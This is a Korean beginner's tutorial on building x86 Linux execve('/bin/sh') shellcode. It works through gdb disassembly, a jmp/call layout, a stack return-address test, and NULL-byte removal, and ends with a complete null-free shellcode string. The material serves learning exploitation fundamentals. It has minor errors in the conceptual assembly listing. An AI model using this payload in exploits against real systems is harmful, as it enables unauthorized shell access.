================================================================
Topic : Making Basic Shellc0de For Kidz
Author : Ham Ji Man (realdata@igrus.inha.ac.kr)
Reference : Phrack 49-14 [Smashing The Stack For Fun And Profit]
            Security+ for Unix (written by PLUS)
            Brennan's Guide to Inline Assembly
Special Thanks to: IGRUS Troops (.tf, andsoon)
================================================================            

<Preface>

이 문서는 초보자인 제 자신이 이미 만들어진 B0f에 관한 여러 문서들을 보면서 쉽게 
이해할수 없었던 부분을 다음에 공부하시는 분들에게 조금이나마 도움이 되기 위해서
만든 것입니다. 많은 도움이 되시길 바랍니다.

<Index>

1. C code for Shell
2. AT&T assembly Syntax
3. Analyze main()
4. Analyze execve()
5. Analyze exit()
6. Condition of ShellCode
7. Useful Shellcode
8. Completed Shellc0de

-------------------------------------------------------------------------------

1. C code for Shell

shellcode.c
===========================================
#include <stdio.h>

void main() {
        char *name[2];
        
        name[0] = "/bin/sh";
        name[1] = NULL;
        execve(name[0], name, NULL);
}
===========================================

[realdata@realdata b0f]$gcc -o shellcode -ggdb -static shellcode.c
[realdata@realdata b0f]$gdb shellcode
GNU gdb 4.17.0.11 with Linux support
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disass main
Dump of assembler code for function main:
0x8048198 <main>:       pushl  %ebp
0x8048199 <main+1>:     movl   %esp,%ebp
0x804819b <main+3>:     subl   $0x8,%esp
0x804819e <main+6>:     movl   $0x8072428,0xfffffff8(%ebp)
0x80481a5 <main+13>:    movl   $0x0,0xfffffffc(%ebp)
0x80481ac <main+20>:    pushl  $0x0
0x80481ae <main+22>:    leal   0xfffffff8(%ebp),%eax
0x80481b1 <main+25>:    pushl  %eax
0x80481b2 <main+26>:    movl   0xfffffff8(%ebp),%eax
0x80481b5 <main+29>:    pushl  %eax
0x80481b6 <main+30>:    call   0x804d0d0 <execve>
0x80481bb <main+35>:    addl   $0xc,%esp
0x80481be <main+38>:    leave  
0x80481bf <main+39>:    ret    
End of assembler dump.
(gdb) disass execve
Dump of assembler code for function __execve:
0x804bb10 <__execve>:   pushl  %ebx
0x804bb11 <__execve+1>: movl   0x10(%esp,1),%edx
0x804bb15 <__execve+5>: movl   0xc(%esp,1),%ecx
0x804bb19 <__execve+9>: movl   0x8(%esp,1),%ebx
0x804bb1d <__execve+13>:        movl   $0xb,%eax
0x804bb22 <__execve+18>:        int    $0x80
0x804bb24 <__execve+20>:        popl   %ebx
0x804bb25 <__execve+21>:        cmpl   $0xfffff001,%eax
0x804bb2a <__execve+26>:        jae    0x804be30 <__syscall_error>
0x804bb30 <__execve+32>:        ret    
End of assembler dump.
[realdata@realdata b0f]$ 


2. AT&T assembly syntax

위의 disassemble한 결과를 분석하기 위해서는 우선 AT&T assembly의 문법을 이해해야 겠죠.
Intel syntax와 비교해서 설명하겠습니다. Intel Assembly를 알고 있다는 것을 전제로 합니다.
      
   - Register naming
     AT&T syntax는 register name 앞에 "%"를 붙입니다.
     
     AT&T : %eax
     Intel : eax
     
   - Source/Destination Ordering
     Intel assembly에서는 Operand의 순서가 [Destination Op][Source OP]였죠.
     하지만 AT&T syntax는 그 반대로 사용합니다.
     다음은 eax register의 값을 ebx에 저장시키는 예입니다.
     
     AT&T : movl %eax,%ebx
     Intel : mov ebx,eax
     
   - Constant value/immediate value format
     AT&T assembly에서 Constant, immediate value를 나타내는 방법은 value앞에 
     "$"가 나온다. 아래의 예를 보면,
     
     AT&T : movl $_blah,&eax (C언어의 Static Variable blah)
     Intel : mov eax,_blah
     
     AT&T : movl $0xd00d,%ebx
     Intel : mov ebx,d00dh
     
   - Operator size specification
     Intel과는 달리 AT&T assembly는 구체적인 사이즈를 명시해준다.
     생략할 수는 있지만, 생략한다면 GNU Assembler가 임의로 선택한다. 사이즈를 명시하는 것을
     권장한다.
     b - byte, w - word, l - longword (Intel : dword)
     
     AT&T : movw %ax,%bx
     Intel : mov bx,ax
   
   - Referencing memory(386-protected mode)
     
     AT&T : immediate_value(32)(base, index, scale)
     Intel : [base + index * scale + immediate32]  
   
   - Addressing what a register points to :
   
     AT&T : (%eax)
     Intel : [eax]
     
   - Do offset with the immediate value :
   
     AT&T : 1(%eax) or 0x4(%esi)
     Intel : [eax + 1]


3. Anaylaze main()

0x8048198 <main>:       pushl  %ebp       //예전의 프레임 포인터를 저장(스택에 푸쉬).
0x8048199 <main+1>:     movl   %esp,%ebp  //현재 스택 포인터를 새로운 프레임 포인터로 함.
0x804819b <main+3>:     subl   $0x8,%esp  //지역변수(Local Variable)가 들어갈 공간 확보. 

지역변수는 프레임 포인터로 부터 음수로 뻗어나가기 때문에 공간 확보를 위해서 subl로 빼준다.
shellcode.c에서 보면 char *name[2]; 에 의해 char형 포인터가 들어갈 8바이트를 확보한 것이다.
(참고로 포인터의 길이는 1워드이다.)
여기까지가 프로시저의 프롤로그에 해당된다.

0x804819e <main+6>:     movl   $0x8072428,0xfffffff8(%ebp)
%ebp의 0xfffffff8인 곳에 0x8072428이라는 문자열 "/bin/sh" 주소값을 복사.
        name[0] = "/bin/sh";

0x80481a5 <main+13>:    movl   $0x0,0xfffffffc(%ebp)
%ebp의 0xfffffffc인 곳에 NULL(4byte)을 복사.
        name[1] = NULL;
                                        
이제부터 execve의 실제 호출과정이 이루어 진다.
0x80481ac <main+20>:    pushl  $0x0
execve의 인자들을 스택에 반대순서로 밀어넣는다. NULL로 시작한다.
        execve(name[0], name, NULL);

0x80481ae <main+22>:    leal   0xfffffff8(%ebp),%eax
%ebp의 0xfffffff8의 주소를 %eax에 로드.

0x80481b1 <main+25>:    pushl  %eax
%eax를 스택에 밀어 넣는다.

0x80481b2 <main+26>:    movl   0xfffffff8(%ebp),%eax
%ebp의 0xfffffff8의 내용 즉, 문자열 "/bin/sh"의 주소를 %eax로 복사.

0x80481b5 <main+29>:    pushl  %eax
%eax를 스택에 밀어 넣는다.

0x80481b6 <main+30>:    call   0x804d0d0 <execve>
execve를 호출한다. 이때 call명령은 IP(Instruction Pointer)에 push한다.


4. Analyze execve()

0x804bb10 <__execve>:   pushl  %ebx
0x804bb11 <__execve+1>: movl   0x10(%esp,1),%edx
NULL 포인터의 주소를 %edx로 복사.

0x804bb15 <__execve+5>: movl   0xc(%esp,1),%ecx
name[]의 주소를 %ecx로 복사.

0x804bb19 <__execve+9>: movl   0x8(%esp,1),%ebx
"/bin/sh"의 주소를 %ebx에 복사.

0x804bb1d <__execve+13>:        movl   $0xb,%eax
시스템 호출 목록 색인에서의 execve의 번호 11을 %eax에 복사.

0x804bb22 <__execve+18>:        int    $0x80
커널모드로 돌아가기 위한 소프트웨어 인터럽트.

0x804bb24 <__execve+20>:        popl   %ebx


5.exit함수 뜯어 보기.

exit.c
===========================================
#include <stdio.h>

void main() {
        exit(0);
        }
===========================================

[realdata@realdata b0f]$ gcc -o exit -ggdb -static exit.c
[realdata@realdata b0f]$ gdb exit
GNU gdb 4.17.0.11 with Linux support
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x804bae0 <_exit>:      movl   %ebx,%edx
0x804bae2 <_exit+2>:    movl   0x4(%esp,1),%ebx //인자(0)를 받아서 %ebx에 저장.
0x804bae6 <_exit+6>:    movl   $0x1,%eax  //exit 시스템 호출 번호 1을 %eax에 저장.
0x804baeb <_exit+11>:   int    $0x80
0x804baed <_exit+13>:   movl   %edx,%ebx
0x804baef <_exit+15>:   cmpl   $0xfffff001,%eax
0x804baf4 <_exit+20>:   jae    0x804bdf0 <__syscall_error>
End of assembler dump.
(gdb) quit


6.Condition of ShellCode

  이제 우리는 위의 execve함수와 exit함수를 조합하여 완성된 쉘코드를 만드는 일이 남아있다.
  우선 쉘코드가 올바르게 작동되어야 할 조건을 살펴보자.
  
  1) NULL문자로 종료되는, 문자열 "/bin/sh"을 메모리에 위치시켜야 한다.
  2) 문자열 "/bin/sh"의 주소를 메모리에 저장한다.
  3) 0xb(execve의 시스템 호출 코드)를 eax레지스터에 복사.
  4) 문자열 "/bin/sh"의 주소를 ebx 레지스터에 복사.
  5) 문자열 "/bin/sh"의 주소가 저장된 주소를 ecx 레지스터에 로드.
  6) 4byte의 NULL의 주소를 edx레지스터에 복사.
  7) int 0x80 명령 실행.
  8) 0x1(exit의 시스템 호출 코드)을 eax 레지스터에 복사.
  9) 0x0을 ebx 레지스터에 복사.
  10) int 0x80 명령 실행.

  이것을 개념적인 Shellcode로서 나타내 보면 다음과 같다.
  ==================================
  movl        string_addr,string_addr_addr
  movb        $0x0,null_byte_addr
  movl        $0x0,null_addr
  movl        $0xb,%eax
  movl        string_addr,%ebx
  leal        string_addr_addr,%ebx
  leal        null_string,%edx
  int        $0x80
  movl        $0x1,%eax
  movl        $0x0,%ebx
  int        $0x80
  .string "/bin/sh"
  ==================================


7. Useful Shellcode
   
   우리는 문자열 "/bin/sh"이 저장될 메모리의 공간을 알 수 없다. 그렇기 때문에 꽁수이지만
   JMP와 CALL을 사용한다.
   우리가 사용할 쉘코드의 제일 앞에 JMP 명령을 두어 CALL로 뛰어넘어가도록 한다. 이때 
   CALL은 JMP명령 뒤의 popl을 호출하게 하면서 CALL명령 뒤의 문자열 "/bin/sh"의 메모리 
   주소가 스택에 push된다. 이렇게 되면 우리는 %esp 레지스터를 pop시켜서 문자열 "/bin/sh"의 
   메모리 주소를 손쉽게 알수 있다.
   
   ============================================
   jmp        popl - int offset                #2 byte
   popl %esi                                #1 byte
   movl        string_addr,string_addr_addr        #3 byte
   movb        $0x0,null_byte_addr                #4 byte
   movl        $0x0,null_addr                        #7 byte
   movl        $0xb,%eax                        #5 byte
   movl        string_addr,%ebx                #2 byte
   leal        string_addr_addr,%ecx                #3 byte
   leal        null_string,%edx                #3 byte
   int        $0x80                                #2 byte
   movl        $0x1,%eax                        #5 byte
   movl        $0x0,%ebx                        #5 byte
   int        $0x80                                #2 byte
   call        call - popl offset                #5 byte
   .string "/bin/sh"                        #8 byte
   ============================================

   자 이제 실제 취약점에 이용해도 될 만큼 쉘코드를 개략적으로 완성했다. 실제 값을 넣어보자.
   ====================================================================================
   void main() {
           __asm__("
                   jmp        0x2a                             #2 byte
                   popl    %esi                                #1 byte
                   movl        %esi,0x8(%esi)                  #3 byte
                   movb        $0x0,0x7(%esi)                   #4 byte
                   movl        $0x0,0xc(%esi)                        #7 byte
                   movl        $0xb,%eax                        #5 byte
                   movl        %esi,%ebx                       #2 byte
                   leal        0x8(%esi),%ecx                        #3 byte
                   leal        0xc(%esi),%edx                        #3 byte
                   int        $0x80                                #2 byte
                   movl        $0x1,%eax                        #5 byte
                   movl        $0x0,%ebx                        #5 byte
                   int        $0x80                                #2 byte
                   call        -0x2f                                #5 byte
                   .string \"/bin/sh\"                        #8 byte
                   ");
   }
   ====================================================================================
   이것을 gcc inline assembler로 컴파일한 후, 진정한 쉘코드를 얻겠다.
   
[realdata@realdata b0f]$ gcc -o shellcode2 -g -ggdb shellcode2.c
[realdata@realdata b0f]$ gdb shellcode2
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disass main
Dump of assembler code for function main:
0x8048398 <main>:       pushl  %ebp
0x8048399 <main+1>:     movl   %esp,%ebp
0x804839b <main+3>:     jmp    0x80483c7 <main+47>
0x804839d <main+5>:     popl   %esi
0x804839e <main+6>:     movl   %esi,0x8(%esi)
0x80483a1 <main+9>:     movb   $0x0,0x7(%esi)
0x80483a5 <main+13>:    movl   $0x0,0xc(%esi)
0x80483ac <main+20>:    movl   $0xb,%eax
0x80483b1 <main+25>:    movl   %esi,%ebx
0x80483b3 <main+27>:    leal   0x8(%esi),%ecx
0x80483b6 <main+30>:    leal   0xc(%esi),%edx
0x80483b9 <main+33>:    int    $0x80
0x80483bb <main+35>:    movl   $0x1,%eax
0x80483c0 <main+40>:    movl   $0x0,%ebx
0x80483c5 <main+45>:    int    $0x80
0x80483c7 <main+47>:    call   0x804839d <main+5>
0x80483cc <main+52>:    das    
0x80483cd <main+53>:    boundl 0x6e(%ecx),%ebp
0x80483d0 <main+56>:    das    
0x80483d1 <main+57>:    jae    0x804843b
0x80483d3 <main+59>:    addb   %cl,%cl
0x80483d5 <main+61>:    ret    
End of assembler dump.
(gdb) x/bx main+3
0x804839b <main+3>:     0xeb
(gdb) x/bx main+4
0x804839c <main+4>:     0x2a
(gdb) x/bx main+5
0x804839d <main+5>:     0x5e
(gdb)  
  .
  .
  .

이렇게 만들어진 쉘코드로 잠시 테스트를 해보자.
test_shell.c
===========================================================

char shellc0de[] = 
"\xeb\x2a"                        //jmp        0x2a
"\x5e"                                //popl        %esi
"\x89\x76\x08"                        //movl        %esi,0x8(%esi)
"\xc6\x46\x07\x00"                //movb        $0x0,0x7(%esi)
"\xc7\x46\x0c\x00\x00\x00\x00"  //movl        $0x0,0xc(%esi)
"\xb8\x0b\x00\x00\x00"                //movl        $0xb,%eax
"\x89\xf3"                        //movl        %esi,%ebx
"\x8d\x4e\x08"                        //leal        0x8(%esi),%ecx
"\x8d\x56\x0c"                        //leal        0xc(%esi),%edx
"\xcd\x80"                        //int        $0x80
"\xb8\x01\x00\x00\x00"                //movl        $0x1,%eax
"\xbb\x00\x00\x00\x00"                //movl        $0x0,%ebx
"\xcd\x80"                        //int        $0x80
"\xe8\xd1\xff\xff\xff"                //call        -0x2f
"/bin/sh";                        //.string \"/bin/sh\"

void main(){
        int *ret;
        
        ret = (int *)&ret + 2;
        (*ret) = (int)shellc0de;
        
}

===========================================================
[realdata@realdata b0f]$ gcc -o test_shell test_shell.c
[realdata@realdata b0f]$ ./test_shell 
bash$ exit
exit
[realdata@realdata b0f]$ 

자 테스트한 결과 우리가 만든 쉘 코드가 제대로 작동한다.
하지만 위의 테스트에서는 shellc0de를 문자형이 아닌 정수형으로
취급했다. 어떤 문제가 있는가? 우리가 흔히 exploit할 취약점을 가진 프로그램들은
문자형 버퍼를 사용하기 때문에 \x00 과 같은 NULL 바이트는 문자의 끝으로 인식하기
때문에 쉘코드를 끝까지 실행시킬 수 없다. 이제 NULL 바이트를 없애 볼 것이다.
아래에서 NULL 바이트가 나타나는 부분을 찾아보자.

char shellc0de[] = 
"\xeb\x2a"                        //jmp        0x2a
"\x5e"                                //popl        %esi
"\x89\x76\x08"                        //movl        %esi,0x8(%esi)
"\xc6\x46\x07\x00"                //movb        $0x0,0x7(%esi)  NULL
"\xc7\x46\x0c\x00\x00\x00\x00"  //movl        $0x0,0xc(%esi)  NULL
"\xb8\x0b\x00\x00\x00"                //movl        $0xb,%eax       NULL
"\x89\xf3"                        //movl        %esi,%ebx
"\x8d\x4e\x08"                        //leal        0x8(%esi),%ecx
"\x8d\x56\x0c"                        //leal        0xc(%esi),%edx
"\xcd\x80"                        //int        $0x80
"\xb8\x01\x00\x00\x00"                //movl        $0x1,%eax       NULL
"\xbb\x00\x00\x00\x00"                //movl        $0x0,%ebx       NULL
"\xcd\x80"                        //int        $0x80
"\xe8\xd1\xff\xff\xff"                //call        -0x2f
"/bin/sh";                        //.string \"/bin/sh\"

모두 다섯군데에서 NULL 바이트가 나왔다. 하나씩 살펴 보자.

movb        $0x0,0x7(%esi)  NULL
movl        $0x0,0xc(%esi)  NULL
위 두 명령은 조금만 생각한다면 쉽게 NULL 바이트가 나오지 않는 명령으로 바꿀수 있다.
xorl        %eax,%eax        //xorl명령으로 %eax를 NULL(0)으로 초기화 한다.
movb        %eax,0x7(%esi)  //그리고 NULL대신 NULL로 초기화된 %eax를 복사한다.
movl        %eax,0xc(%esi)
어떤가? 우리는 어느 경로로 가나 목적지에 도착만 하면 되는 것이다.

movl        $0xb,%eax        ->        movl        $0xb,%al

movl        $0x1,%eax                xorl        %ebx,%ebx
movl        $0x0,%ebx        ->        movl        %ebx,%eax
                                inc        %eax
이렇게 우리는 NULL바이트가 포함된 코드를 살짝 바꿔서 NULL바이트를 제거 하였다.


8.Completed Shellcode

우리의 사랑스런 정성과 노력으로 완성된 쉘코드이다. 이 쉘코드는 Intel x86 Linux에서
유효하다.

=====================================================================  
char shellc0de[]=
        "\xeb\x1f"                      /* jmp 0x1f              */
        "\x5e"                          /* popl %esi             */
        "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
        "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
        "\xb0\x0b"                      /* movb $0xb,%al         */
        "\x89\xf3"                      /* movl %esi,%ebx        */
        "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
        "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
        "\xcd\x80"                      /* int $0x80             */
        "\x31\xdb"                      /* xorl %ebx,%ebx        */
        "\x89\xd8"                      /* movl %ebx,%eax        */
        "\x40"                          /* inc %eax              */
        "\xcd\x80"                      /* int $0x80             */
        "\xe8\xdc\xff\xff\xff"          /* call -0x24            */
        "/bin/sh";                      /* .string \"/bin/sh\"   */
=====================================================================
   
쉘코드를 직접 만들어본 기분이 어떤가? Script Kid를 벗어난 기분인가?
이제 우리는 다른 이들이 이미 만들어논 쉘코드를 찌익 긁을 필요가 없다.
그리고 쉘코드의 기본적인 면을 이해했다면 여기서 머무를것이 아니라 더욱
발전된 쉘코드를 만들려고 마음먹어야 할 것이다. 

위의 설명중 난해한 부분이나 수정될 부분이 있다면 가차없이 메일을 보내주시기 
바랍니다.